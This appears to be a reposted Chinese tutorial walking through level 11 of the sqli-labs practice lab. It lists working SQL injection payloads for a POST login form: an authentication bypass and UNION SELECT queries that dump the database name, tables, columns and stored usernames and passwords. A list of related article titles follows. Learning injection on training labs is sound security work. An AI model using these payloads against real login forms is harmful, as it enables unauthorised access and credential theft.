sqli-labs的sql注入——基础挑战之less11
来源:互联网 发布:四大文明古国 知乎 编辑:程序博客网 时间:2024/05/22 10:22
需要使用火狐插件hackbar插件(这里使用Post data)
1.有两个传入参数的地方,一个是username;一个是password
找到这两个传入参数所对应的名字uname和passwd(检查网页源代码)
2.uname=username &&passwd=password 是注入点;在uname=admin' 加入单引号报错,通过报错信息,证明是单引号字符型注入
3.逻辑算法输入真值得到用户和密码;uname=admin' or '1'='1# &&passwd=password
4.暴当前使用的数据库uname=1admin'union select 1,database()# &&passwd=password
5.暴库中表uname=1admin'union select group_concat(table_name),database() from information_schema.tables where table_schema =database() # &&passwd=password
6.暴表中列 uname=1admin'union select 1,group_concat(column_name) from information_schema.columns where table_name='users'# &&passwd=password
7.暴出列中的数据,这样我们就可以得到想知道的用户密码uname=1admin' union select username,password from users where id=5# &&passwd=password
阅读全文
0 0
- sqli-labs的sql注入——基础挑战之less11
- 通过sqli-labs学习sql注入——基础挑战之less11-22
- 通过sqli-labs学习sql注入——基础挑战之less1-10
- 通过sqli-labs学习sql注入——进阶挑战之less23-28a
- 【SQL注入之sqli-labs】Less 1
- 【SQL注入之sqli-labs】Less 6
- SQL注入之手工注入sqli-labs-master
- SQL注入之sqlmap爆破sqli-labs-master
- SQL注入之盲注sqli-labs-master
- 【SQL注入】windows下sqli-labs的搭建
- SQL注入练习平台sqli-labs
- Sqli-labs学习SQL注入-Lesson 1-10总结
- Sqli-labs学习SQL注入-Lesson 11-20总结
- SQLI-LABS(Part 1)——搭建
- Sqli-labs之Less1-10
- sqli-labs lesson1字符型注入
- sqli-labs
- sqli-labs
- web.xml详解
- Respberry Pi Firefox 中文设置
- 初步了解Ethereal/Wireshark 软件
- Http Header status
- MyBatis之全局配置文件(Configuration XML)之运行时行为设置(settings)
- sqli-labs的sql注入——基础挑战之less11
- 博客
- Android设置Dialog对话框背景颜色圆角
- MySQL从头至尾汇总(5.执行篇)
- ZCMU1899
- 迭代硬阈值(IHT)
- linux下安装activeMq
- import
- input域之file附件选择控件